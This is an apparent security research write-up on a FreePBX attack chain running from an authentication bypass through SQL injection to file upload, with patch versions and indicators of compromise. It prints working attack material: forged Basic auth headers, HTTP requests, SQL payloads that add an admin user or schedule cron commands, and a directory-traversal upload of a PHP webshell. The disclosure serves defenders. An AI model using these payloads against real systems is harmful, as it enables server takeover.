FreePBX Auth Bypass: Anatomy of CVE-2025-66039

The VoIP Rabbit Hole: From Auth Bypass to RCE in FreePBX

FreePBX is a cornerstone of modern business communications; its open-source nature and robust feature set make it a popular IP PBX management tool. This widespread adoption, however, also paints a large target on its back. When security researchers began investigating CVE-2025-57819, a vulnerability being exploited in the wild, they stumbled upon an entirely new attack chain: a critical authentication bypass that serves as a gateway to SQL injection and ultimate remote code execution.

This analysis unpacks that chain, starting with an authentication bypass (CVE-2025-66039) that affects non-default configurations and culminating in full system compromise via SQL injection (CVE-2025-61675) and arbitrary file uploads (CVE-2025-61678).

CVE-2025-66039: The Unlocked Door

The initial point of entry hinges on a specific, non-default configuration in FreePBX's advanced settings. The system offers several authentication types; the vulnerability lies within the webserver type. This mode delegates authentication to the underlying web server (e.g., Apache), a legacy approach that introduces a critical flaw.

When webserver authentication is active, FreePBX expects Apache to handle user verification. The application code, however, incorrectly processes authentication headers. It checks for the presence of PHP_AUTH_USER in the request but fails to validate the corresponding password. An attacker can simply provide a forged Authorization header with a valid username (like the default admin) and any password to bypass the authentication mechanism entirely.

An unauthenticated request to a vulnerable endpoint reveals the issue with a verbose error message:

Whoops\Exception\ErrorException: Undefined array key "PHP_AUTH_USER" in file /var/www/html/admin/libraries/gui_auth.php on line 38

This error is the first signal that the system is misconfigured. By simply adding a Base64-encoded Authorization: Basic YWRtaW46YWRtaW4= header (admin:admin), the attacker gains access, triggering the next vulnerability in the chain.

The Chain Reaction: From SQL Injection to System Takeover

With the authentication hurdle cleared, the attacker gains access to numerous authenticated endpoints riddled with SQL injection flaws. These are tracked under CVE-2025-61675 and affect multiple parameters across the Endpoint Management module.

Exploiting SQL Injection (CVE-2025-61675)

We identified four unique endpoints with 11 vulnerable parameters. For instance, the id parameter in the Custom Extension configuration is susceptible. By sending a crafted POST request, an attacker can trigger a database error, confirming the vulnerability.

Vulnerable Request:

POST /admin/config.php?display=endpoint&view=customExt HTTP/1.1
Host: <target-ip>
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Authorization: Basic YWRtaW46YWRtaW4=

id=&#039;

Revealing Response:

HTTP/1.0 500 Internal Server Error
...
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1 in file /var/www/html/admin/modules/endpoint/EndpointCommon.class.php on line 1953
...

This is not a theoretical risk; this access can be weaponized immediately. An attacker can inject SQL commands to create new administrative users or, more critically, insert malicious cron jobs to achieve remote code execution.

Payload to add a new admin user horizon3:

id=1';INSERT INTO ampusers (username, password_sha1, sections) VALUES (0x686f72697a6f6e33, 0x35653838343839386461323830343731353164306535366638646336323932373733363033643064, 0x2a)#

Payload for RCE via cron_jobs table:

INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES (&#039;sysadmin&#039;,&#039;horizon3&#039;,&#039;<command>&#039;,NULL,&#039;* * * * *&#039;,30,1,1) -- 

Final Stage: Arbitrary File Upload for RCE (CVE-2025-61678)

For a more direct path to RCE, the attacker can leverage the same authentication bypass to exploit an arbitrary file upload vulnerability in the firmware update functionality. The application allows uploading custom firmware but fails to properly validate the file path or content.

An attacker can manipulate the fwbrand parameter in a multipart form request to perform a directory traversal attack, placing a malicious PHP webshell in the web root (/var/www/html).

Malicious Upload Request:

POST /admin/ajax.php?module=endpoint&command=upload_cust_fw HTTP/1.1
Host: <target-ip>
Authorization: Basic cmFuZG9tOnJhbmRvbQ==
Cookie: PHPSESSID=<valid-session-id>;
Content-Type: multipart/form-data; boundary=----geckoformboundary

------geckoformboundary
Content-Disposition: form-data; name="fwbrand"

../../../var/www/html
------geckoformboundary
Content-Disposition: form-data; name="file"; filename="webshell.php"
Content-Type: application/octet-stream

<?php if(isset($_GET[&#039;cmd&#039;])) { system($_GET[&#039;cmd&#039;] . &#039; 2>&1&#039;); } ?>
------geckoformboundary--

Once the webshell is uploaded, the attacker has persistent remote code execution capabilities, achieving full control over the server.

Mitigation and Remediation

FreePBX has released patches to address these vulnerabilities. Administrators must upgrade to the appropriate versions immediately:

• FreePBX 16: Upgrade to 16.0.42 for the auth bypass fix and 16.0.92 for the SQLi/File Upload fixes.
• FreePBX 17: Upgrade to 17.0.22 for the auth bypass fix and 17.0.6 for the SQLi/File Upload fixes.

The patch for CVE-2025-66039 removes the ability to select webserver authentication from the GUI. It now must be set manually via the command line, and doing so will display a persistent security warning on the dashboard.

Security Advisory
Your system is using webserver authentication for the Authorization Type, which may offer reduced security. To revert to the default, safer authentication method, run the following command:
fwconsole setting AUTHTYPE usermanager

Even with the patch, the underlying vulnerable code remains; it relies on proper configuration for security. The definitive fix is to never use the webserver authentication type.

Indicators of Compromise (IoCs)

Security teams should audit their FreePBX instances for the following signs of compromise:

• Unexpected or unauthorized user accounts in the ampusers table.
• Suspicious entries in the cron_jobs table, especially those with unusual commands.
• The presence of webshells or other unknown PHP files in web-accessible directories like /var/www/html/.
• Web server logs showing requests to admin endpoints with Authorization headers but no valid session cookies.

Conclusion: Configuration is Critical

This exploit chain demonstrates how a single, non-default configuration can completely undermine system security. While the initial authentication bypass is not present in default installations, its existence highlights the dangers of legacy features and the necessity of defense-in-depth. Attackers did not need a zero-day; they simply needed one unlocked door to walk through. Proactive vulnerability management and continuous configuration auditing are not optional; they are essential to preventing a business-critical communication platform from becoming an attacker's foothold.